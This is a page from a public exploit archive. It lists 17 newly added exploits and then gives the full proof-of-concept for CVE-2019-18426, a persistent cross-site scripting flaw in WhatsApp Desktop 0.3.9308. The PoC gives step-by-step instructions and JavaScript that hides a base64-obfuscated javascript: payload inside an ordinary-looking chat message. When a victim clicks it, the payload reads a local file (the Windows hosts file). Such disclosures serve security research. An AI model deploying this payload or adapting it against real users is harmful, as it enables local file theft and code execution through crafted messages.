85bef6929f
17 changes to exploits/shellcodes Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) Frigate 3.36 - Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) Memu Play 7.1.3 - Insecure Folder Permissions Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) Microsoft NET USE win10 - Insufficient Authentication Logic LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit) WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting Bolt CMS 3.7.0 - Authenticated Remote Code Execution LimeSurvey 4.1.11 - 'File Manager' Path Traversal pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
42 lines
No EOL
1.6 KiB
Text
42 lines
No EOL
1.6 KiB
Text
# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
|
|
# Date: 2020-01-21
|
|
# Exploit Author: Gal Weizman
|
|
# Vendor Homepage: https://www.whatsapp.com
|
|
# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
|
|
# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
|
|
# Version: 0.3.9308
|
|
# Tested On: Mac OS, Windows, iPhone
|
|
# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426
|
|
|
|
// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
|
|
// step 2: open devtools and search in all files "t=e.id"
|
|
// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
|
|
// step 4: paste "https://example.com" in the text box and hit "Enter"
|
|
// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
|
|
|
|
var payload = `(async function() {
|
|
alert(navigator.userAgent);
|
|
(async function() {
|
|
// read "file:///C:/windows/system32/drivers/etc/hosts" content
|
|
const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
|
|
const t = await r.text();
|
|
alert(t);
|
|
}())
|
|
}())`;
|
|
|
|
payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
|
|
|
|
e.__x_matchedText = payload;
|
|
|
|
e.__x_body = `
|
|
Innocent text
|
|
|
|
${payload}
|
|
|
|
More Innocent text
|
|
`;
|
|
|
|
// step 6: press F8 in order for the execution to continue
|
|
// result: a message should be sent to the victim that once is clicked will execute the payload above
|
|
|
|
// further information: https://github.com/weizman/CVE-2019-18426 |